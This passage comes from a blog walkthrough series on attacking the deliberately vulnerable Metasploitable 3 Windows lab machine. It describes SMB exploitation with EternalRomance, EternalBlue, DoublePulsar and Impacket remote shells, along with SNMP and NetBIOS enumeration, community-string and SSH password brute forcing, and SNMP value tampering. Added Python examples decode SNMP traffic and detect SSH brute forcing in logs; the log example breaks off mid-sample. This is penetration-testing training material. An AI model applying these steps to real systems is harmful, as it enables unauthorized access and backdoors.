will just crash the remote machine</li></ul></ul><h3>Eternal Romance Exploit</h3><p>Eternal Romance is one of the SMBv1 exploits from the leaked NSA exploit collection. This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with an Administrator session. From there, the normal <b>psexec</b> payload code execution is done:<p>Check if the target is vulnerable:<p><a href="https://drive.google.com/uc?id=1YXptdb3SOS9KyfYbRPIXcKUX8Djug_bh" target="_blank"><img width="806" height="132" title="Checking for Eternal Romance vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking for Eternal Romance vulnerability" src="https://drive.google.com/uc?id=1z0KXjKLbe01Q--ahBf6zJiKEQeM6OS7J" border="0"></a><p>Exploit:<p><a href="https://drive.google.com/uc?id=1LyhYMtw-h7TvX7UQ7y_3cMslPFozprsx" target="_blank"><img width="806" height="402" title="Exploiting the Eternal Romance vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting the Eternal Romance vulnerability" src="https://drive.google.com/uc?id=1ZX-QPMRqx3M_nLIJAqqm6eLynaWqVd5u" border="0"></a><p>It is also possible to use the web delivery method to exploit this vulnerability:<ul><li>Run the <b><em>exploit/multi/script/web_delivery</em> </b>module (set <b>Target 3-Regsvr32</b>)</li><ul><li>Get a command</li></ul><li>Run the <strong><em>auxiliary/admin/smb/ms17_010_command</em> </strong>module</li><ul><li>Use the previous command</li></ul><li>Get a meterpreter shell</li></ul><p><a href="https://drive.google.com/uc?id=1QDcqeRb5ztBONBdoevozwtv7uFXGbT5w" target="_blank"><img width="806" height="348" title="Exploiting the Eternal Romance vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting the Eternal Romance vulnerability" 
src="https://drive.google.com/uc?id=1-Bxrusl-Pe2YapPaDtOaPZ5hek2T9xk5" border="0"></a></p><p><a href="https://drive.google.com/uc?id=1YHhLLAhpfY8GR2CMxrt5gFpbDl2uQr5c" target="_blank"><img width="796" height="570" title="Exploiting the Eternal Romance vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting the Eternal Romance vulnerability" src="https://drive.google.com/uc?id=1QE6XZ8x2XrvAWt5bTEVKefWtHdxn_dmy" border="0"></a></p><h3>Eternal Blue Exploit</h3><p>Eternal Blue is the exploit used to launch the famous WannaCry ransomware attack. Try using Nmap to check for this vulnerability:<p><a href="https://drive.google.com/uc?id=1gGpnYvuZX3fXFuh6uZaMOvS6DXY1FsTV" target="_blank"><img width="806" height="340" title="Checking for Eternal Blue vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking for Eternal Blue vulnerability" src="https://drive.google.com/uc?id=1pujaB7daU9_LvzpRtF0fpJ7PR0TQxOl8" border="0"></a><p>Exploit:<p><a href="https://drive.google.com/uc?id=1Ufs4HniekbBjkxKgIpop-UWqr5GluYLg" target="_blank"><img width="799" height="574" title="Exploit Eternal Blue" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploit Eternal Blue" src="https://drive.google.com/uc?id=1kLVeyJeAsEXaVgWYu1dS2EZV8gottMb9" border="0"></a><h3>Double Pulsar Exploit</h3><p>You can deploy a backdoor to the remote machine. 
First, clone the appropriate GitHub repository:<p><a href="https://drive.google.com/uc?id=10semGLXb9WCzmYzNHHGBu5lWctC-d1YT" target="_blank"><img width="806" height="325" title="Preparing the Double Pulsar payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Preparing the Double Pulsar payload" src="https://drive.google.com/uc?id=1g69afP6E-202gI_xK_MsTLcfpr19Ck5o" border="0"></a><p><b>NOTE</b>: You need to install wine32 before running this script:<ul><li><strong>dpkg --add-architecture i386</strong></li><li><strong>apt-get update</strong></li><li><strong>apt-get install -y wine32</strong></li></ul><p>Deploy the backdoor:<p><a href="https://drive.google.com/uc?id=1zdulVbMVHFLqqWxb04ff9oPRde-2hwYi" target="_blank"><img width="806" height="369" title="Deploying the Double Pulsar backdoor" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Deploying the Double Pulsar backdoor" src="https://drive.google.com/uc?id=1Gm6UzjHcoM7hJUolcnLH1CXSYD_Az2v0" border="0"></a><p>Exploit using Metasploit:<p><a href="https://drive.google.com/uc?id=1qdVZf-ARBT4YDy5nMwjpavNUJmsN94LS" target="_blank"><img width="806" height="312" title="Exploiting Double Pulsar" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Double Pulsar" src="https://drive.google.com/uc?id=18ruYs62ZT3FppPZ3pky9qU_6pvXIz1JY" border="0"></a><h3>Exploiting SMB using Impacket</h3><p>The <b><em>psexec.py</em></b> script lets you execute processes on remote Windows systems, copy files on remote systems, process their output and stream it back. 
It allows execution of remote shell commands directly with the full interactive console without having to install any client software.</p><p><a href="https://drive.google.com/uc?id=1dXTX-C1uNtYc_GaoV7x5vzSEWyiG-4UG" target="_blank"><img width="806" height="311" title="Exploiting SMB with Impacket scripts" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting SMB with Impacket scripts" src="https://drive.google.com/uc?id=1C-SS4IAF5zMMUt7NnXXV_tliII_R0yaN" border="0"></a><p>The <b><em>smbexec.py</em></b> method takes advantage of the native Windows SMB functionality to execute arbitrary commands on the remote system. This approach does not require anything to be uploaded on the remote system and is therefore somewhat less prone to detection.<p><a href="https://drive.google.com/uc?id=1GcD1thXClG0pyKp9bPcMlcqDBuJlWqoV" target="_blank"><img width="806" height="156" title="Exploiting SMB with Impacket scripts" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting SMB with Impacket scripts" src="https://drive.google.com/uc?id=1efoEdQv43dA-Sbvzcuw9MSjByn_Z0v7y" border="0"></a><p>The <b><em>wmiexec.py</em></b> script uses the Windows Management Instrumentation (WMI) interface of the remote Windows system to spawn a semi-interactive shell. Like the dcomexec method, wmiexec requires communication over three network ports/services. <p>First, it uses ports tcp/135 and tcp/445, and ultimately it communicates with the Winmgmt Windows service over a dynamically allocated high port such as tcp/50911. 
This makes the wmiexec method noisier than the other methods.<p><a href="https://drive.google.com/uc?id=1oQxbYb8hbNw4E_m-M-mAEO943aTih_SO" target="_blank"><img width="806" height="187" title="Exploiting SMB with Impacket scripts" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting SMB with Impacket scripts" src="https://drive.google.com/uc?id=1ICPsO-igYcNt7ARw6WKDP3OJqQl-7vrv" border="0"></a><p>There are other Impacket scripts, not all of them allowing RCE, but some of them potentially very useful against a Domain Controller. You can find them at <b><em>/usr/share/doc/python3-impacket/examples</em></b>.<p>Rui Natário | http://www.blogger.com/profile/12067366039242874604 | noreply@blogger.com | 2 | tag:blogger.com,1999:blog-6396309617370994433.post-4219971543397427000 | 2020-11-05T04:23:00.000-08:00 | 2020-11-21T04:19:38.567-08:00 | Metasploitable 3 Windows Walkthrough: Part IV<h2>Exploiting Port 137 (UDP) – NetBIOS Name Service</h2><p>The name service operates on UDP port 137. The name service primitives offered by NetBIOS are:<ul><li>Add name – registers a NetBIOS name.</li><li>Add group name – registers a NetBIOS “group” name.</li><li>Delete name – un-registers a NetBIOS name or group name.</li><li>Find name – looks up a NetBIOS name on the network.</li></ul><p>Usually not exploitable, but useful for enumeration purposes.</p><h3>Enumerating using NBTScan</h3><p>NBTScan is a command-line tool used for scanning networks to obtain NetBIOS shares and name information. 
It can run on both Unix and Windows and ships with Kali Linux by default.<p><a href="https://drive.google.com/uc?id=1L3JY3hkCIVDSxNPxHzjpKadbQbpYPM39" target="_blank"><img width="640" height="391" title="Enumerating with NBTScan" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with NBTScan" src="https://drive.google.com/uc?id=1YsBf2i8xaXRZ5usxu4eFlTufT1NqpIPt" border="0"></a><p>In this case, not a lot of information, but always better than nothing.<a name="more"></a><h3>Enumerating using Nmap</h3><p>Nmap contains a handy little script as part of the Nmap Scripting Engine that we can also use to discover NetBIOS shares. This has the advantage that it can be run with other NSE scripts, ultimately saving time when enumerating many different things on a network.<p><a href="https://drive.google.com/uc?id=19BdxbEbBA3AbN-kHnpMYnQnlhkgKA6sS" target="_blank"><img width="806" height="201" title="Enumerating with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with Nmap" src="https://drive.google.com/uc?id=1pyHoqoS0bJ4D57sci1-12nmOxRDWOn72" border="0"></a><h3>Enumerating using Metasploit</h3><p>As expected, MSF has some modules to be used against NetBIOS. Only one currently produces useful info:<p><a href="https://drive.google.com/uc?id=1cjd8v517url2XRwDmOgmdWEOZcMPTogs" target="_blank"><img width="806" height="146" title="Enumerating with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with Metasploit" src="https://drive.google.com/uc?id=1KspI-6VxemOjJxh0IWh7zeau6jD6L1I9" border="0"></a><h2>Exploiting Port 139 – NetBIOS Session Service</h2><p>A NetBIOS name is up to 16 characters long and usually separate from the computer name. Session mode lets two computers establish a connection, allows messages to span multiple packets, and provides error detection and recovery. 
Two applications start a NetBIOS session when one (the client) sends a command to “call” another client (the server) over TCP Port 139.<h3>Enumerating using Nmap</h3><p>Try to check the correct service version with Nmap:<p><a href="https://drive.google.com/uc?id=1gJjFS8KPzhxCFfwVtDazh1POE3qe5447" target="_blank"><img width="806" height="165" title="Checking NetBIOS version with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking NetBIOS version with Nmap" src="https://drive.google.com/uc?id=1cBbqjd9CE-E-R3jV_ZvXXFmITu4GCbxp" border="0"></a><p>Only a few Nmap scripts can be run against port 139 to produce some valid info:<p>Not really satisfying, right? Two other scripts might reveal some info:<p><a href="https://drive.google.com/uc?id=1un7DxCNMVSAl2GDyp_kU_FWHAmgWNFqx" target="_blank"><img width="794" height="227" title="Getting NetBIOS info with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting NetBIOS info with Nmap" src="https://drive.google.com/uc?id=1VOw1myaJTkfx4mM-_8mA_uC08-BCoLpc" border="0"></a><h2><a href="https://drive.google.com/uc?id=1FwhkV9GOkQ2g_Qzlw3QZaiU-WAVpKdcM" target="_blank"><img width="607" height="213" title="Getting NetBIOS info with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting NetBIOS info with Nmap" src="https://drive.google.com/uc?id=1fY9lPMsWvU9sq8_nlYK81-6ABEReEy1B" border="0"></a></h2><h2>Exploiting Port 161 (UDP) – SNMP</h2><p>Simple Network Management Protocol is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior.<h3>Enumerating SNMP using Metasploit</h3><p>MSF has several modules to enumerate a target using the SNMP features.<p>This one will only list the remote users:<p><a href="https://drive.google.com/uc?id=1Djv8ToPgjhjpfX0JTcbMSypv8A8J7xC1" target="_blank"><img 
width="825" height="135" title="Enumerating SNMP with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SNMP with Metasploit" src="https://drive.google.com/uc?id=1vKHZCBUZPxp3SErqsZq6k94Mkuj4GjmS" border="0"></a><p>These results can now be used to attack other services.<p>This module will give you a full description of the remote system:<p><a href="https://drive.google.com/uc?id=1AjsbjoXCWqW0tGOJAFvkh7OiCPodbfqR" target="_blank"><img width="826" height="563" title="image" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SNMP with Metasploit" src="https://drive.google.com/uc?id=1m1iGYc7aNeYeib1MT2vMCwa2uczSz2HH" border="0"></a><h3>Enumerating SNMP using Nmap</h3><p>Nmap has several NSE scripts that can be used against hosts where SNMP service is running:<p><a href="https://drive.google.com/uc?id=1BZHbLRpVRBka-7S8JCKZ7W_I_eNLDLe1" target="_blank"><img width="405" height="270" title="Nmap SNMP scripts" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Nmap SNMP scripts" src="https://drive.google.com/uc?id=1NzN6BUsObljkYb3L-FAq9JPxSrYszohn" border="0"></a><p>Most scripts will give enumeration information, but you might want to exploit the remote machine directly. 
Try to brute force the SNMP community strings:<p><a href="https://drive.google.com/uc?id=1GPQOHjuSr7fc0OPwFO93yPhXSdt-zig9" target="_blank"><img width="806" height="95" title="Brute forcing SNMP with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SNMP with Nmap" src="https://drive.google.com/uc?id=1A700ORdw9Jk2y0JoRuFf8wOKcgfx3lnD" border="0"></a><p>For whatever reason, Nmap 7.80 freezes and the script never displays any result.<p>But Nmap version 7.4 worked perfectly, displaying the “<b><em>public</em></b>” string:<p><a href="https://drive.google.com/uc?id=16-Eq7rlOk34UWn_n0i8bY5ezYeh3uKPz" target="_blank"><img width="806" height="218" title="Brute forcing SNMP with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SNMP with Nmap" src="https://drive.google.com/uc?id=1xU_tgAOCYUHQ3L03tRecHOrfeLIqp96k" border="0"></a><p>Nice! You have got the SNMP community string: “public”. Many devices come with default SNMP community strings such as public, private, etc. These community strings are used as credentials to read and write SNMP information depending on the configuration. When an attacker finds an SNMP community string, he can read lots of juicy information from the target machine if the configuration is Read-Only. 
An attacker can also make modifications if the configuration is Read-Write.<p>Some of the other scripts will also produce important information about the remote system:<p><a href="https://drive.google.com/uc?id=14PdL6642KU-9BBDQbsL7xsuGKWaJ4eLi" target="_blank"><img width="806" height="356" title="Enumerating SNMP with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SNMP with Nmap" src="https://drive.google.com/uc?id=1G_76-TEk1a_vO6NciEX741c1cUTcYwk1" border="0"></a><p><a href="https://drive.google.com/uc?id=1C7mcWiA2evOfvajLhTTZSSzM-5_XCfO1" target="_blank"><img width="806" height="449" title="Enumerating SNMP with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SNMP with Nmap" src="https://drive.google.com/uc?id=1UNnY5UlpFzY35G5Q5TL27lPxRpuZYPcR" border="0"></a></p><p><a href="https://drive.google.com/uc?id=1aW2G1YBN7CU8SgEAt1Z10ec-H7hROIxZ" target="_blank"><img width="805" height="535" title="Enumerating SNMP with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SNMP with Nmap" src="https://drive.google.com/uc?id=10x_-zmmLtxgzv3BkeuPf5iDVf2JmbV8V" border="0"></a></p><h3>Enumerating SNMP using snmp-check</h3><p>This is a simple SNMP enumerator, but it will give you a lot of information:<p><a href="https://drive.google.com/uc?id=1HDHx1-kcHCW_IxezXQ1sw1WJ6vdiNrEE" target="_blank"><img width="688" height="818" title="Enumerating SNMP with snmp-check" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SNMP with snmp-check" src="https://drive.google.com/uc?id=1XyY4n0_fztER3JE2gzY0BJiwZ0oOzMks" border="0"></a><p>MSF’s <b><em>snmp_enum</em> </b>module is an implementation of this tool.<h3>Brute forcing SNMP using onesixtyone</h3><p>Another tool to brute force SNMP community strings is <b><em>onesixtyone</em></b>. 
You can easily find the <b><em>public</em></b> string.<p><a href="https://drive.google.com/uc?id=1XFV7Ki9G44mmNLP8XP-P3DQdpwtI4E0z" target="_blank"><img width="806" height="95" title="Brute forcing SNMP with onesixtyone" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SNMP with onesixtyone" src="https://drive.google.com/uc?id=18rvkv8QSpEu3PxHw_sLq1f0Ae-bl-Mn6" border="0"></a><p>You can use the dictionary file from the onesixtyone tool itself. This can be much faster than Nmap, but it all depends on the quality of the dictionary file.<h3>Brute forcing SNMP using snmpwalk</h3><p>SNMPWalk is a popular tool for testing SNMP. This tool acts as an SNMP client, and you can use it for your penetration testing when you need to make requests to the SNMP service on the target host.<p>You can also use this tool to check if a specific community string exists or not. Try to see if the “<b><em>public</em></b>” community string exists. <p><a href="https://drive.google.com/uc?id=13n8pcDb-JY2BzDgpgiLhOv3538SOz-xI" target="_blank"><img width="701" height="353" title="Checking public string with SNMPWalk" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking public string with SNMPWalk" src="https://drive.google.com/uc?id=1wl4cacEBUUtvejCjOUllxydvLFSARZRi" border="0"></a><p>If the “public” community string is supported, we will be able to see the output as shown in the above figure. Now, try another community string:<p><a href="https://drive.google.com/uc?id=1RbG8BbXkXBaNIo_Tshw4hcvzMCccxpCT" target="_blank"><img width="490" height="78" title="Checking private strings with SNMPWalk" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking private strings with SNMPWalk" src="https://drive.google.com/uc?id=16zM0Qs9qV6mPxJeCBytyU5AT-YEEDNop" border="0"></a><p>As you can see, there is no response from the target host because this community string is not supported. 
This is how you can use this tool to determine if a specific community string is allowed or not.<h3>Attacking the SNMP service</h3><p>Use <b><em>snmpwalk</em></b> to extract the SNMP data and display it on the terminal. The following command can be used to filter out the value of <b><em>sysName</em></b>:<p><a href="https://drive.google.com/uc?id=1nuQe_vbe9O9LtSBhJRyNy3Ubu7NpO-_p" target="_blank"><img width="543" height="70" title="Filtering sysname with snmpwalk" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Filtering sysname with snmpwalk" src="https://drive.google.com/uc?id=1Amxi1yN_P-83sej6UwuVC5VYUZtCE00k" border="0"></a><p>Another option is to use the <b><em>snmpget</em></b> command:<p><a href="https://drive.google.com/uc?id=1aWYMFDVYcVOB2YChy5z98NDx6QubHEdo" target="_blank"><img width="527" height="67" title="Filtering sysname with snmpget" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Filtering sysname with snmpget" src="https://drive.google.com/uc?id=1ugKFxvfOFbJ61pXmZXXgUWAM5mSJPQZA" border="0"></a><p>If the SNMP service was misconfigured with “rw” authorization, an attacker could modify these values using the <b><em>snmpset</em></b> utility. 
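<p>To see what <b><em>snmpget</em></b> and <b><em>snmpset</em></b> actually put on the wire, and why a read-write community string matters so much, here is an added example in Python (not code from the original post or from the Net-SNMP tools): a minimal BER encoder and decoder for SNMPv2c messages. It builds the GetRequest for <b><em>sysName</em></b> (OID 1.3.6.1.2.1.1.5.0) that snmpget sends, decodes any v1/v2c message back into its community string, PDU type, request id and variable bindings, and exposes a small check a defender can run over captured UDP/161 payloads to flag SetRequest PDUs, which are only legitimate where write access is intended. Function names, the request id and the sample values are this example's own choices.</p>

```python
"""Minimal SNMPv2c BER codec: what snmpget/snmpset put on the wire.

Added example, not code from the original post or from Net-SNMP. Function
names, request ids and sample values are this example's own choices.
"""
from __future__ import annotations

# ASN.1 BER tags used by SNMP
INTEGER, OCTET_STRING, NULL, OID, SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
GET_REQUEST, GET_NEXT, RESPONSE, SET_REQUEST = 0xA0, 0xA1, 0xA2, 0xA3
PDU_NAMES = {GET_REQUEST: "GetRequest", GET_NEXT: "GetNextRequest",
             RESPONSE: "Response", SET_REQUEST: "SetRequest"}
SYS_NAME_OID = "1.3.6.1.2.1.1.5.0"   # SNMPv2-MIB::sysName.0


def _length(n: int) -> bytes:
    """BER length: one byte below 128, otherwise 0x80|count followed by the bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _length(len(body)) + body


def _int(value: int) -> bytes:
    # Minimal two's-complement INTEGER (non-negative values); a leading 0x00
    # byte is added automatically when the high bit would otherwise be set
    return _tlv(INTEGER, value.to_bytes(value.bit_length() // 8 + 1, "big", signed=True))


def _oid(dotted: str) -> bytes:
    """Encode a dotted OID: the first two arcs share one byte, the rest are base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(OID, bytes(out))


def encode_request(pdu_tag: int, community: str, varbinds, request_id: int = 1) -> bytes:
    """Build an SNMPv2c message. varbinds: list of (oid, value); value None sends
    a NULL (as a GetRequest does), a str is sent as an OCTET STRING (snmpset's s type)."""
    vbl = b""
    for oid, value in varbinds:
        val = _tlv(NULL, b"") if value is None else _tlv(OCTET_STRING, value.encode())
        vbl += _tlv(SEQUENCE, _oid(oid) + val)
    # PDU body: request-id, error-status, error-index, variable-bindings
    pdu = _int(request_id) + _int(0) + _int(0) + _tlv(SEQUENCE, vbl)
    return _tlv(SEQUENCE, _int(1) + _tlv(OCTET_STRING, community.encode()) + _tlv(pdu_tag, pdu))


def _read_tlv(data: bytes, pos: int):
    """Return (tag, body, position after the element)."""
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    return tag, data[pos:pos + length], pos + length


def _decode_oid(body: bytes) -> str:
    arcs, acc = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))


def decode_message(data: bytes) -> dict:
    """Parse a v1/v2c message into version, community, PDU type, request id and varbinds."""
    tag, msg, _ = _read_tlv(data, 0)
    if tag != SEQUENCE:
        raise ValueError("not an SNMP message")
    _, version, pos = _read_tlv(msg, 0)
    _, community, pos = _read_tlv(msg, pos)
    pdu_tag, pdu, _ = _read_tlv(msg, pos)
    _, rid, pos = _read_tlv(pdu, 0)
    _, _, pos = _read_tlv(pdu, pos)      # error-status
    _, _, pos = _read_tlv(pdu, pos)      # error-index
    _, vbl, _ = _read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = _read_tlv(vbl, pos)
        _, oid_body, vpos = _read_tlv(vb, 0)
        vtag, vbody, _ = _read_tlv(vb, vpos)
        if vtag == OCTET_STRING:
            value = vbody.decode(errors="replace")
        elif vtag == INTEGER:
            value = int.from_bytes(vbody, "big", signed=True)
        else:
            value = None
        varbinds.append((_decode_oid(oid_body), value))
    return {"version": int.from_bytes(version, "big", signed=True),
            "community": community.decode(errors="replace"),
            "pdu_type": PDU_NAMES.get(pdu_tag, f"0x{pdu_tag:02x}"),
            "request_id": int.from_bytes(rid, "big", signed=True),
            "varbinds": varbinds}


def is_write_attempt(data: bytes) -> bool:
    """Defender check for captured UDP/161 payloads: a SetRequest is what snmpset
    sends, and only makes sense where a read-write community is intended."""
    return decode_message(data)["pdu_type"] == "SetRequest"


if __name__ == "__main__":
    req = encode_request(GET_REQUEST, "public", [(SYS_NAME_OID, None)], request_id=42)
    print(req.hex())
    print(decode_message(req))
```

<p>The community string travels in clear text as the second element of the message, which is why a sniffed snmpget exchange leaks it, and why SNMPv1/v2c with a read-write community is effectively unauthenticated remote configuration.</p>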
<p><a href="https://drive.google.com/uc?id=1XnmmqrqFUqc6Pc3fc7lmaF-XUNtiJJxh" target="_blank"><img width="553" height="128" title="Changing sysname with snmpset" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Changing sysname with snmpset" src="https://drive.google.com/uc?id=1dKem2qb63WWJxURKw8_qdrGsdHg5cmeO" border="0"></a><p>Similarly, you can change the values of any object, thus spoofing the responses from the SNMP service.<p><b>NOTE</b>: By default, the SNMP service in Metasploitable 3 is set to <b><em>Read Only</em></b>. If you want to test this attack, you have to change that setting:<p><a href="https://drive.google.com/uc?id=1RyTuueuj_lWuDiLr2LgvdHwf1hmWLi6y" target="_blank"><img width="805" height="588" title="image" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="image" src="https://drive.google.com/uc?id=1fRFdc8u4v_A2HI66oII-ze6dPUGPxnPV" border="0"></a><p><br><p>Rui Natário | http://www.blogger.com/profile/12067366039242874604 | noreply@blogger.com | 0 | tag:blogger.com,1999:blog-6396309617370994433.post-2957873298026592397 | 2020-11-04T17:10:00.000-08:00 | 2020-11-21T04:18:35.524-08:00 | Metasploitable 3 Windows Walkthrough: Part III<h2>Exploiting Port 22 – SSH</h2><p>First, a reminder of the information Nmap returned about the SSH service after a port scan:<p><a href="https://drive.google.com/uc?id=1RMsK-HoHkonhLNp25Tg_1GdvREfQMA4u" target="_blank"><img width="789" height="50" title="Port 22 Nmap scan results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Port 22 Nmap scan results" src="https://drive.google.com/uc?id=1rfIav1z8nMBTPVtAG1ICgxkcX_Bz0IC2" border="0"></a><p>The first challenge, when cracking SSH credentials via brute force, is to find usernames. 
There are two methods to do this:</p><ul><li>Guess usernames from services</li><li>Obtain usernames from a file on the machine</li></ul><p>It would be great if we could log in via SSH as system, but this is usually disabled. To be successful, we will need a list of users on the system. This can be obtained in many ways; sometimes credentials are immediately reported either by Legion or by OpenVAS.<p><a href="https://drive.google.com/uc?id=1ONzVNqE4AjY_gHqO14N5gDfK9HqWryfS" target="_blank"><img width="822" height="289" title="Hydra results displayed in the Legion scan" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Hydra results displayed in the Legion scan" src="https://drive.google.com/uc?id=1sldoYv5CgExAdAkCnSsbou2blNBTUa10" border="0"></a><p><a href="https://drive.google.com/uc?id=1QMUbY69wTlAcGRxlPB4BZZ3kFJbTKUcQ" target="_blank"><img width="815" height="188" title="OpenVAS results displaying SSH credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OpenVAS results displaying SSH credentials" src="https://drive.google.com/uc?id=1QYv8eiOAxfAjit0nYGt1LDZ9p0nb7XiN" border="0"></a><p>Once you have the usernames, you can try and crack the passwords.<ul><li>For password wordlists, use the ones provided with Kali or use SecLists from Daniel Miessler on GitHub: <b><em>https://github.com/danielmiessler/SecLists</em></b>.</li><li>If you have usernames only, use Hydra to brute-force credentials.</li><li>If you have usernames and password hashes, use John the Ripper to brute-force credentials.</li></ul><p>Also, keep in mind that sometimes it will be easy to get credentials for other running services. 
Then, using the previously identified credentials, it is easy to create a small custom list of usernames and passwords and attempt to get more using the usual tools.<a name="more"></a><h3>Brute forcing SSH using Hydra</h3><p>Once you have a list of credentials, you can use Hydra as you did for the FTP service: <p><a href="https://drive.google.com/uc?id=1bMuKSQlVhqvOW_xoGuWvZbCmrPIxWnWf" target="_blank"><img width="806" height="161" title="Brute forcing SSH with Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH with Hydra" src="https://drive.google.com/uc?id=1yZ8gbyHdLAwJKU1iGalB-Rn8MZDhvvq9" border="0"></a><h3>Brute forcing SSH using Metasploit</h3><p>Metasploit has an auxiliary module that will test SSH credentials on a range of machines and report successful logins. If you have connected to a database, this module will record successful logins and hosts so you can track your access.<p>In addition, each successful login will immediately open a session on the remote machine. Then, this session can possibly be upgraded to a Meterpreter session.<p><a href="https://drive.google.com/uc?id=15oJR-b4HLw2cv0BQ7tj2yV7cWx7aLL6N" target="_blank"><img width="806" height="423" title="Brute forcing SSH with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH with Metasploit" src="https://drive.google.com/uc?id=1K-QPNa0Wu6J_vZaRI8cnfFLEhTlPxvYD" border="0"></a><p>You will get two high-privilege command shell sessions, but it is not possible to upgrade them to Meterpreter…!<p><strong>NOTE:</strong> You can see the module’s advanced options by typing <b><em>show advanced</em></b> or just <b><em>advanced</em></b>.<h3>Brute forcing SSH using Nmap</h3><p>Using Kali’s wordlists, you will get some results. 
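<p>Every attempt made by Hydra, the Metasploit SSH login scanner or the Nmap brute script leaves a line in the target's sshd log, which is where a defender catches this activity. As an added example (not code from the original post or from any of those tools), the Python script below parses constructed auth.log lines, slides a 60-second window over the failed logins of each source address, and reports any source that exceeds a failure threshold, together with the usernames it tried and any account it eventually logged into. The log lines, the thresholds and the year used to complete the syslog timestamps are all constructed for this example.</p>

```python
"""Detect SSH password brute forcing in sshd auth.log lines.

Added example, not part of the original post; the log lines, thresholds
and the year used for the syslog timestamps are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH password-auth outcome lines as written to auth.log (syslog format)
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse(line: str, year: int = 2020):
    """Return (timestamp, result, user, ip) or None for lines we do not care about.
    Syslog timestamps carry no year, so one is supplied (assumption: 2020)."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect(lines, window_s: int = 60, max_failures: int = 5) -> dict:
    """Return {ip: finding} for every source with more than max_failures failed
    logins inside any window_s-second window. 'compromised' lists accounts that
    accepted a password from that source after the burst began."""
    events = defaultdict(list)          # ip -> [(ts, result, user)]
    for line in lines:
        parsed = parse(line)
        if parsed:
            ts, result, user, ip = parsed
            events[ip].append((ts, result, user))
    findings = {}
    for ip, evs in events.items():
        evs.sort()
        fails = [e for e in evs if e[1] == "Failed"]
        burst_start, lo = None, 0
        for hi in range(len(fails)):                 # sliding window over failures
            while (fails[hi][0] - fails[lo][0]).total_seconds() > window_s:
                lo += 1
            if hi - lo + 1 > max_failures:
                burst_start = fails[lo][0]
                break
        if burst_start is None:
            continue
        users = sorted({e[2] for e in fails})
        success = [e[2] for e in evs if e[1] == "Accepted" and e[0] >= burst_start]
        findings[ip] = {"failures": len(fails), "users": users, "compromised": success}
    return findings


# Constructed sample log: one brute-forcing source, one user who mistyped once
SAMPLE_LOG = """\
Nov 18 06:12:01 m3 sshd[1201]: Failed password for invalid user admin from 192.0.2.10 port 51001 ssh2
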